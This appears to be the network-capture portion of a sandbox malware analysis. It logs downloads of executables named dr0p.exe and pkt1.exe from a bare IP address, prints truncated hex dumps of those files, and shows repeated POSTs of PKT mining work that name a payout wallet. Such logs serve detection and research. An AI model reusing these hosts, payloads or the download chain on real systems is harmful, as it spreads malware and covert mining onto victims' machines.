Jan 7, 2025 11:59:48.458081961 CET	1.1.1.1	192.168.2.5	0x91be	No error (0)	any.ah.pkt.world	23.147.168.70	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:48.458081961 CET	1.1.1.1	192.168.2.5	0x91be	No error (0)	any.ah.pkt.world	23.147.168.69	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:48.458081961 CET	1.1.1.1	192.168.2.5	0x91be	No error (0)	any.ah.pkt.world	199.16.240.207	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:59:48.458081961 CET	1.1.1.1	192.168.2.5	0x91be	No error (0)	any.ah.pkt.world	23.147.168.71	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:58:52.431338072 CET	196	OUT	GET /dr0p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Accept: / Accept-Encoding: identity Host: 23.27.51.244 Connection: Keep-Alive
Jan 7, 2025 11:58:52.893558025 CET	844	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 10:58:52 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 06 Jan 2025 05:16:56 GMT ETag: "21d-62b02bcbe81b1" Accept-Ranges: bytes Content-Length: 541 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 32 33 50 45 00 00 4c 01 00 00 0f a3 2d e2 00 40 00 11 f6 45 eb 2c 08 00 02 00 0b 01 60 8a 06 d2 e8 32 07 75 6b 4e 4f 31 c9 bd 64 00 00 00 d0 eb 72 eb 75 f1 eb 5a 00 00 40 00 04 00 00 00 04 00 00 00 01 c0 85 c0 79 c2 01 d3 04 00 50 3d 00 00 00 00 eb 77 00 02 30 00 00 00 5a 7c e7 c3 02 00 00 00 53 bf 00 00 42 00 6a 01 58 31 ed 01 f6 57 6a 08 59 6a 04 3d 00 00 00 00 6a 05 ba de 65 24 14 b3 1f 60 04 00 31 c0 99 8b 74 24 28 4e eb 8c 61 75 0e 40 42 d2 0e 72 04 d1 ea eb 02 d1 e8 d2 06 46 39 f7 7f e8 b1 05 89 e6 01 56 24 3d 00 00 00 00 74 05 01 46 20 85 d2 e1 ef 61 4b 01 d2 72 c2 75 f9 5b 66 81 ff c0 01 eb 8f f7 e2 f7 f3 5a 39 c6 72 05 92 29 d6 29 d0 d0 17 e2 96 47 eb 90 a0 8e 31 b4 b0 1d da 89 83 00 8e 40 b9 b2 6c 06 e7 12 dd 0b 78 b8 90 f6 ff 18 a4 07 df d7 df 61 c0 33 99 c7 3c 13 82 5b 3c ca 2f c2 f1 52 c6 2a eb a5 8c d7 da a8 db 6e 51 d7 56 52 e4 42 e7 fc e6 6d 93 b5 c7 8e d7 5e 47 f4 f6 e7 17 fb 05 3f 71 d8 50 29 56 83 42 0e 50 a0 ff fc 94 8b 45 85 38 58 0e 60 dd 0a 57 d6 5d 06 be fe 6a 71 2d 19 [TRUNCATED] Data Ascii: MZ23PEL-@E,`2ukNO1druZ@yP=w0Z\|SBjX1WjYj=je$`1t$(Nau@BrF9V$=tF aKru[fZ9r))G1@lxa3<[</RnQVRBm^G?qP)VBPE8X`W]jq-`2>P`Xv{VlT^XdBdA<8jx,}6:c4+WYG)nN@%hjln#rBzc44KcgKz\70b.kO,d6Oc"h$Wdv;}"sm!\ddmTi3u

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:58:57.279774904 CET	96	OUT	GET /pkt1.exe HTTP/1.1 User-Agent: Mozilla/5.0 Host: 23.27.51.244 Cache-Control: no-cache
Jan 7, 2025 11:58:57.746237040 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 10:58:57 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 06 Jan 2025 05:15:33 GMT ETag: "287a9be-62b02b7c80797" Accept-Ranges: bytes Content-Length: 42445246 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0a 59 8b 17 4e 38 e5 44 4e 38 e5 44 4e 38 e5 44 47 40 76 44 58 38 e5 44 8d bb e6 45 5a 38 e5 44 8d bb e1 45 5c 38 e5 44 8d bb e0 45 11 38 e5 44 3e b9 e1 45 46 38 e5 44 3e b9 e4 45 43 38 e5 44 4e 38 e4 44 46 3a e5 44 5d bc e6 45 5b 38 e5 44 5d bc ec 45 c3 3a e5 44 5d bc e5 45 4f 38 e5 44 5d bc 1a 44 4f 38 e5 44 5d bc e7 45 4f 38 e5 44 52 69 63 68 4e 38 e5 44 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0a 00 21 5f 11 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 aa 61 00 00 ec 31 00 00 00 00 00 90 fe 5c 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$YN8DN8DN8DG@vDX8DEZ8DE\8DE8D>EF8D>EC8DN8DF:D]E[8D]E:D]EO8D]DO8D]EO8DRichN8DPEd!_g"(a1\@p`fygyhp s{`,~pTp(@Eb@ady`.textaa `.CLR_UEFaa `.rdataaa@@.datayty@.pdata`{bz@@.didat8n}@Section p}@_RDATA204r}@@.rsrc spt~@@.reloc,~@B
Jan 7, 2025 11:58:57.746265888 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8d 0d d9 9f 61 00 e9 a8 ea 5c 00 cc cc cc cc 48 8d 0d e9 9f 61 00 e9 98 ea 5c 00 cc cc cc cc b9 20 00 00 00 48 Data Ascii: Ha\Ha\ H<y3AIfL@H@ LHPH@8HuLyHy LyHyH(Jy@Hya7y%'yH(H(
Jan 7, 2025 11:58:57.746277094 CET	1236	IN	Data Raw: cc cc cc cc cc cc cc cc 48 8d 0d 79 9c 61 00 e9 f8 e5 5c 00 cc cc cc cc 48 83 ec 28 48 8d 0d 05 26 7b 00 e8 10 2f 5d 00 48 8d 0d 79 9c 61 00 48 83 c4 28 e9 d4 e5 5c 00 48 8d 0d e9 9c 61 00 e9 c8 e5 5c 00 cc cc cc cc 48 8d 0d 69 9d 61 00 e9 b8 e5 Data Ascii: Hya\H(H&{/]HyaH(\Ha\Hia\H(H&{.]HiaH(\HYa\H(AHVnH &{ RHaH(W\H(AHVnH0&{ RHaH('\H(AH
Jan 7, 2025 11:58:57.746305943 CET	1236	IN	Data Raw: 3a 01 00 00 41 8b ce 8b 57 10 8d 04 12 be fc 3f 00 00 3b c6 0f 42 f0 44 3b e9 0f 86 0b 01 00 00 41 8b ed 41 3b d5 0f 47 ea 45 85 ff 74 10 49 8b cc e8 1e ce 03 00 45 8b fe 44 89 74 24 38 c7 44 24 28 06 00 00 00 44 89 74 24 20 45 33 c9 41 b8 1d 00 Data Ascii: :AW?;BD;AA;GEtIEDt$8D$(Dt$ E3AH:zHL$pCA@HL$p=WLMtIAD\|$8HHtDCD+CE3E;v\|HtHcKHC HH/LA@A@(Z+HHD$pHt,HOHHk
Jan 7, 2025 11:58:57.746315956 CET	1236	IN	Data Raw: 25 03 00 00 c0 0d 03 00 00 80 89 43 28 c7 43 30 01 00 00 00 c7 43 34 01 00 00 00 48 8d 9f e8 01 00 00 0f 57 c0 0f 11 03 0f 11 43 10 0f 11 43 20 0f 11 43 30 81 4b 28 00 00 00 40 48 8b cb ff 15 04 b7 61 00 8b 43 28 25 01 00 00 c0 0d 01 00 00 80 89 Data Ascii: %C(C0C4HWCC C0K(@HaC(%C(C0C4H(WCC C0K(@HaC(%C(C0C4@Ha%0@H\a0%
Jan 7, 2025 11:58:57.746325970 CET	1236	IN	Data Raw: 41 57 48 8d 68 a1 48 81 ec 00 01 00 00 0f 29 70 b8 0f 29 78 a8 44 0f 29 40 98 48 8d 4c 24 38 e8 18 c5 00 00 90 8b 54 24 40 f6 c2 02 74 57 f6 c2 40 75 44 4c 8b 44 24 48 8b ca f7 d1 83 e1 01 8b 44 24 38 d3 e8 8d 48 ff 49 03 c8 4c 3b c1 73 0e 41 80 Data Ascii: AWHhH)p)xD)@HL$8T$@tW@uDLD$HD$8HIL;sA8\|IL;ruT$@T$@@T$@HL$8,T$@D$8H"uI@u6HD$HHH;s8\|HH;ruT$@T$@@T$@HL$8,T$@A
Jan 7, 2025 11:58:57.746387005 CET	1236	IN	Data Raw: f6 74 16 4d 8b c6 33 d2 48 8b 0d 79 68 7b 00 ff 15 03 ab 61 00 8b 54 24 24 4c 8b f6 48 89 74 24 30 89 54 24 24 45 85 ff 74 05 83 cb 08 eb 03 83 e3 f7 89 5c 24 28 83 e3 ef 89 5c 24 28 66 0f 73 de 08 66 0f 7e f1 41 d3 e5 45 85 ed 74 0f 45 8b c5 48 Data Ascii: tM3Hyh{aT$$LHt$0T$$Et\$(\$(fsf~AEtEHUIW]A3tBt0fBt0}tMwHHH\|$P(\|$Pta@uDIAHIL;s:\|HH;rH;u\$(\$(@\$(HL$ ,Lt$0\$
Jan 7, 2025 11:58:57.746398926 CET	1236	IN	Data Raw: 48 8b 4c 24 20 c7 41 0c 01 00 00 00 8b 05 d2 27 7a 00 85 c0 74 20 e8 d9 73 1c 00 eb 19 85 c9 74 15 48 8b 4c 24 20 44 89 61 0c 8b 41 08 a8 1b 74 05 e8 de 77 1c 00 48 8b c3 48 8b 5c 24 60 48 8b 6c 24 68 48 83 c4 30 41 5f 41 5e 41 5c 5f 5e c3 cc cc Data Ascii: HL$ A'zt stHL$ DaAtwHH\$`Hl$hH0A_A^A\_^@SVWH0~+HD$PH5b3HtH0HXHbHHH&$zH<+HD$PHtH0HXHbHHH#zH+HD$PHtH0HXH
Jan 7, 2025 11:58:57.746409893 CET	1224	IN	Data Raw: db 0f 84 d0 02 00 00 48 8d be 68 0f 00 00 8d 53 ff 48 8b cf e8 27 a2 00 00 4c 8b f0 8b 05 5e 60 7b 00 85 c0 75 0b e8 45 e2 56 00 8b 05 4f 60 7b 00 3b d8 0f 82 93 02 00 00 4d 85 f6 74 16 44 8d 48 ff 8b d3 4c 8b 05 2d 60 7b 00 49 8b ce ff 15 ac ab Data Ascii: HhSH'L^`{uEVO`{;MtDHL-`{IaHGGtDxfDxH,OHHHEEEHcHEEEEE+HEEEEE\A
Jan 7, 2025 11:58:57.746424913 CET	1236	IN	Data Raw: 99 1b 00 48 8b 4e 08 48 85 c9 74 06 e8 07 9a 1b 00 90 48 8d 4e 40 e8 5d e1 ff ff 90 48 8d 4e 10 e8 73 af 03 00 ba 98 00 00 00 48 8b ce e8 36 bc 5c 00 89 7c 24 28 48 8b 5c 24 60 48 83 c4 30 5f 5e 5d c3 e8 10 e7 2b 00 90 cc cc cc cc cc cc cc cc cc Data Ascii: HNHtHN@]HNsH6\\|$(H\$`H0_^]+H\$WH0+HHD$@Ht]H(@HaG(%G(OX@HO0aGX%GXHG`HD$H3HXHXH_x3H\|$ \$(HED$
Jan 7, 2025 11:58:57.751334906 CET	1236	IN	Data Raw: 00 48 89 44 24 40 48 8b 00 48 89 44 24 40 48 85 c0 75 11 b9 31 00 00 00 e8 87 43 01 00 48 89 44 24 40 eb 05 48 89 44 24 40 48 89 05 cc 18 7a 00 48 8b 05 55 0d 7a 00 48 05 38 01 00 00 48 89 44 24 40 48 8b 00 48 89 44 24 40 48 85 c0 75 11 b9 27 00 Data Ascii: HD$@HHD$@Hu1CHD$@HD$@HzHUzH8HD$@HHD$@Hu'KCHD$@HD$@HzHzHHD$@HHD$@HuCHD$@HD$@HDzHzH`HD$@HHD$@HuBHD$@HD$@HzHyzHT$@HT

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:59:48.701011896 CET	277	OUT	POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2836973 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 11:59:48.701133013 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 04 01 00 37 ec 60 58 b4 43 17 1f ec 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4007`XCI+6HYCzp:S%(j5oy4$)C7O/$?d\jUVtKP8bD9~0:uxZMJ\|h!?"X[@1Edgc(Je+w4t
Jan 7, 2025 11:59:48.705893993 CET	1236	OUT	Data Raw: 6d 74 65 d3 78 e8 69 e0 20 3e 6e e2 58 85 dd 9f cd e1 17 6c 20 67 5c cb ce 10 85 63 cd 50 bb 88 b9 59 fb 2b 03 ea b6 65 34 fa 49 2f f0 04 63 08 69 00 b8 c9 9c b1 07 84 15 62 14 e6 d8 db 72 5d 14 c1 3e 5e 60 fa 6b 61 cc 5c 6a f6 29 5d db d6 87 a2 Data Ascii: mtexi >nXl g\cPY+e4I/cibr]>^`ka\j)]!1/m%~)uV$8FsrN>X{3eS/UCqsKGC-dp:!*r=^"7<@Y\A400Z7`XCI+
Jan 7, 2025 11:59:48.706134081 CET	4944	OUT	Data Raw: 79 d9 b4 96 9e 2a cc 39 c1 5f 0d 0a 34 30 30 0d 0a 01 e6 04 00 38 ec 60 58 b4 43 17 1f ec 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: y*9_4008`XCI+iD8nRX^>4{v<em4oNzOtpE'V?&S"ZVXsV]h.-A]9u=q!i/\>5:x<,6I~Kd)v9yh6K
Jan 7, 2025 11:59:48.706187963 CET	4944	OUT	Data Raw: 8b 8d 9b c0 7c 22 be 8f fc 7d 87 8b ac 03 ba 48 c6 80 66 0d 54 10 32 d5 45 f7 28 0e 01 6b b7 6e a8 88 70 d5 cf f8 75 23 45 b6 aa 5a 3b 52 fc 94 ec 9f 44 ce 06 5a ee 3d 2f c5 f2 92 c9 4c 6a 07 28 45 25 ee 2e ea 88 52 f4 fe 29 1d 56 1f 8c c4 be 3b Data Ascii: \|"}HfT2E(knpu#EZ;RDZ=/Lj(E%.R)V;nbD9!Ym+j5x]"O!=uV$8FsrN>X{3eS/UCqsKGC-dp:Ua2`}^3J.KJm4007`XCI+
Jan 7, 2025 11:59:48.706232071 CET	2472	OUT	Data Raw: 18 59 4b 68 20 dd 86 cf 99 b3 c8 2d 1a 6a 77 a8 3e c6 8d e3 23 d9 a2 f4 ad 4f 22 7d e9 fd 3e 53 e2 ad 3f 55 6d d4 9a 39 13 b1 24 74 1f 6f 53 6f 38 eb e3 ab 59 ad 5e 70 32 97 67 5e f1 2c 4e 55 36 47 b2 67 5d b4 c0 1a b3 04 01 a0 6c 68 b4 0c 4d 6c Data Ascii: YKh -jw>#O"}>S?Um9$toSo8Y^p2g^,NU6Gg]lhMl+PuH5;ODOl%+Isfzng7E:8\dp6jnOMe~og\'\>tvbK9\(g-X0giI2=bfU*In^mIx=ofI8
Jan 7, 2025 11:59:48.706268072 CET	2472	OUT	Data Raw: cc f6 02 3d 44 0a 50 9b 97 da 17 03 e3 72 f0 8b 3a 0d 69 e7 00 3c 0d 0a 34 30 30 0d 0a 01 2e 36 00 38 ec 60 58 b4 43 17 1f ec 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: =DPr:i<400.68`XCI+0V(w(WH%NWaZ-c+X74khck}`Q;qP/\|4}wORNUZ@A<Z!~5}Xi.)4
Jan 7, 2025 11:59:48.706301928 CET	4944	OUT	Data Raw: ac ec 80 5d f3 35 48 80 a4 f6 8c 5b d1 d5 a3 4d 62 5f 4a f5 ff ec 92 80 7f 36 3a b3 ef 29 48 14 64 b3 70 8b 04 ba 4a 50 ec db d2 04 2d ce 4a 92 cd 69 30 ae a8 78 21 ce b8 49 11 7a 87 1d db ab 4c d5 91 1c ed a4 24 fa 02 9b d5 7f 91 0f 8b f6 80 73 Data Ascii: ]5H[Mb_J6:)HdpJP-Ji0x!IzL$sxM8%G)&0?R%;3"FSy0'-`QriBtYrAtf~}2hd'NGY,Tk'o%qlfdPC2gcG?(HR@CH
Jan 7, 2025 11:59:48.706321001 CET	2472	OUT	Data Raw: 50 59 26 b1 75 a3 b6 9c eb 25 5c df ca 79 36 13 29 28 af 00 d3 bf da 38 a2 5e b4 c8 f6 fd da 82 09 25 e5 e9 6e d1 a5 7c cf 04 15 40 b7 36 f1 dd ad fa 01 43 8b 21 a0 2b 2a a5 a6 4e f6 ba d9 55 c2 ef b8 f7 94 7b 2b e1 30 3e 1f 91 ed d7 14 18 b9 97 Data Ascii: PY&u%\y6)(8^%n\|@6C!+NU{+0>w7\|E6M2YOKw db z#/@z@zE5leC#`5Aj##EM;#)![H:=>z~LSI9
Jan 7, 2025 11:59:48.711286068 CET	2472	OUT	Data Raw: 04 6e 44 ea d3 71 c0 9a 83 1e ee b9 0a 89 b6 3d d9 20 a8 08 7f aa 6a fc e2 b4 6e 54 45 3a 47 bb 29 c6 5a 2e 5b 2e 92 db c0 ba c7 0f 51 bf 0e 38 ae 23 6f f2 21 b3 9f e9 a9 c9 a4 aa 95 37 1f 78 a9 75 cb 4f fb 1a 26 67 18 8a 33 f5 d4 07 d2 2a 77 68 Data Ascii: nDq= jnTE:G)Z.[.Q8#o!7xuO&g3*whjm##?.o]'iqNv_@j\4P\ L,C2t7: ahcV6hXTG^r0cE!;S7TrkGtR)I,
Jan 7, 2025 11:59:48.711301088 CET	2472	OUT	Data Raw: 20 84 09 14 dd 86 c9 e8 c1 63 c2 b5 20 05 53 66 2f 6d 05 dd 96 a8 0b 7f 39 f1 e9 3a f6 5e 94 50 b0 9c 0d 0a 34 30 30 0d 0a 01 9a 35 00 35 ec 60 58 b4 43 17 1f ec 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: c Sf/m9:^P40055`XCI+gzI0K$%F(OZWTfyLN/v]QX:!?84!Y@"=gkVr~hc
Jan 7, 2025 11:59:50.045519114 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 07 Jan 2025 10:59:49 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 37 32 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 37 32 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 34 37 35 38 39 39 31 34 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 36 39 37 32 2d 42 41 30 31 36 46 32 41 43 37 35 45 34 35 41 39 35 45 44 46 41 30 46 33 33 30 46 38 46 38 46 44 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":572,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":572,"totalLen":0,"target":521618356,"time":1736247589914,"eventId":"cah-2836972-BA016F2AC75E45A95EDFA0F330F8F8FD"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:59:56.330818892 CET	277	OUT	POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2836973 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 11:59:56.330913067 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 ba 9a 06 37 ec 60 58 b4 43 17 1f ec 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4007`XCI+Zx,0e$~2#J`fDQ%-&_T-Wsf+}!0/ ^\|74eIFT\[&:k]aZ6SU.^b4-d
Jan 7, 2025 11:59:56.335690022 CET	1236	OUT	Data Raw: 36 d4 f2 7c 18 6a 1e af e1 82 03 18 f3 dc 5d 43 40 3b 35 20 55 05 0a d1 6b 85 e6 0b e0 38 4b 93 3b 8a 97 7b e3 66 d0 59 c9 2b ae 19 0e 10 d4 ab 8e 4f f1 b0 db b4 9e 49 de 07 9d 76 23 23 ae 8a 62 5d 7f fa 17 35 41 47 d9 ec 80 49 c4 6b d2 c2 05 56 Data Ascii: 6\|j]C@;5 Uk8K;{fY+OIv##b]5AGIkV6XN/3X27TBPibG[nPU0a&j`#`%E+z5eXjQ*vEA{/0H9s 400B7`XCI+
Jan 7, 2025 11:59:56.335799932 CET	4944	OUT	Data Raw: 73 5a e2 c8 06 d1 e9 91 db 86 0d 0a 34 30 30 0d 0a 01 ab 4f 06 38 ec 60 58 b4 43 17 1f ec 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: sZ400O8`XCI+I]1~F$E5K<q"k_+mY!S ]+A<s5u1t_zTa'cB[#2T]51Yc=HDQwJ
Jan 7, 2025 11:59:56.335894108 CET	12360	OUT	Data Raw: 4a 9e df e0 6e 9e 49 4a 73 94 9d 60 e8 b8 2e 62 d8 fb 04 a8 37 9b fe be 98 6b 5a ba 53 f3 0f 38 3c 7a c7 28 fa 22 cd e4 11 03 07 a3 e6 82 d5 83 27 df 50 a2 17 40 ba e2 8a 05 17 f4 c6 39 7c b1 52 4e 41 a9 34 93 6e 75 ed 8c 54 a2 90 14 bf f4 29 d2 Data Ascii: JnIJs`.b7kZS8<z("'P@9\|RNA4nuT)wZgWJ.x9T]]!~]u2U+mwaHLxINViD ^TzmQ!Fqnb86n!40056`XCI+
Jan 7, 2025 11:59:56.335954905 CET	2472	OUT	Data Raw: 1e 37 25 7e 4a 56 80 ed b4 81 e2 a2 a5 96 bd 63 1b 3b d7 6d cc c0 d7 f3 f1 92 ba b0 50 95 f2 1f 07 9b b3 b2 b1 0e 41 f9 cc 4e fb 54 4e a9 9b 06 ad c7 52 12 bd 3d 69 d2 ba 27 77 65 06 66 64 a9 f8 45 e5 cc f4 22 c5 dd 14 b1 c3 60 46 b6 04 c2 61 5f Data Ascii: 7%~JVc;mPANTNR=i'wefdE"`Fa_GyIZZ VB33?-$'gE8TBPibG[nPU0a&j`#`%E+z5Q1KPD2T +ZV2X400
Jan 7, 2025 11:59:56.336025953 CET	2472	OUT	Data Raw: 7d 85 b3 f1 bf 61 c3 e2 2f 02 7e a1 2b 45 44 0c 26 4a 9a d0 6f e6 27 05 46 b1 96 4b 12 55 a2 0c 61 3e 12 f7 4f e5 73 27 f1 b6 ae 92 f0 e1 dd 26 3a e8 2d a6 04 ff ea 3c 75 2a d7 9a 2b 4d ad 00 6e 01 c1 da 85 57 e1 14 6e 5c f1 ac cf 48 d3 bf 72 c2 Data Ascii: }a/~+ED&Jo'FKUa>Os'&:-<u+MnWn\HrP@R~g+r@Ovo8;l9!HP6jS>@WUG'<4E;x2/)@zzJ4H]Id,/n\r'=%BEMe
Jan 7, 2025 11:59:56.340575933 CET	2472	OUT	Data Raw: ca a6 a1 93 86 e0 5c 7d 77 24 f4 07 67 82 df 7f 6c 73 de 8e ea a5 09 c0 d9 c3 e9 c0 00 12 a4 a3 48 7a 3c 77 ec 17 81 90 71 8c 5b cf 9f 9b 67 e1 85 99 70 e3 a9 2b c7 18 92 88 74 2c 4b 97 8f 4d e1 14 2f 74 ad da 8f 4d 5a 6c 87 1c 29 ab e7 78 8a 04 Data Ascii: \}w$glsHz<wq[gp+t,KM/tMZl)x6\|Q>-;mH-K\fhIDf I +8J2VhaL_iUOqHDD,e73'V%"8e>.05k(/$Rh$8MC8z,OE8kzs5Gji
Jan 7, 2025 11:59:56.340650082 CET	2472	OUT	Data Raw: a2 a9 9d 4a 79 50 01 e9 04 37 49 ec cb 3b c6 e4 62 7e a2 67 bb 8a b2 a8 0f f4 39 62 9d 59 e3 b2 fb fe 0d 0a 34 30 30 0d 0a 01 d3 76 06 36 ec 60 58 b4 43 17 1f ec 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: JyP7I;b~g9bY400v6`XCI+DWlpMJ&bzX$xdVENk?\\&?\TE'z'Pp6cqNSiH~FTB#CZ!D}j
Jan 7, 2025 11:59:56.340687990 CET	4944	OUT	Data Raw: fc 01 8a fe 12 cf 84 fe 71 09 5a 05 bd eb d7 59 21 5e 88 41 03 55 8c 82 c3 7f 2c 18 2a 61 3b 75 55 ac 1a 7c 98 03 45 75 55 ec ab 65 93 e7 3d b1 99 91 ae 40 a6 fc db 16 3f 26 7b f5 08 3e ac 2f 5f c3 d3 61 da 43 94 46 f5 44 b5 06 f5 75 df a5 2a 03 Data Ascii: qZY!^AU,a;uU\|EuUe=@?&{>/_aCFDu@k>E}uir\|p5a]pSj\|WCAhbQ4DI'g.(']fTmMC1tR'-!qaP]lG=ZMA3S9
Jan 7, 2025 11:59:56.340749979 CET	4944	OUT	Data Raw: 71 87 da f9 89 dd 80 4c dd ee a0 20 78 55 96 92 b1 b5 7d cb c4 a9 dd 71 9d f5 ae 32 d3 b6 f7 40 c2 4d 8f bf 97 82 8c bf 22 67 05 4e c4 ef f9 30 82 c9 d4 f3 87 1f db 87 4f 75 1a a0 ae 9b 54 ca 35 68 ab 37 0a 87 a2 29 51 fb 41 7c c7 6d 07 a4 a7 0c Data Ascii: qL xU}q2@M"gN0OuT5h7)QA\|m-62uwK~#y2!@oGAFfCK4Uj'_CacTX(+0OIDy 1E3Etp%W$$OT_#[dSj{eW]Q"h:
Jan 7, 2025 11:59:57.809834957 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 07 Jan 2025 10:59:57 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 31 39 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 31 39 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 34 37 35 39 37 36 38 32 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 36 39 37 32 2d 45 45 33 33 32 36 36 39 44 32 41 30 43 42 44 46 46 43 41 31 38 46 32 39 43 39 35 41 45 30 30 44 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":419,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":419,"totalLen":0,"target":521618356,"time":1736247597682,"eventId":"cah-2836972-EE332669D2A0CBDFFCA18F29C95AE00D"}}

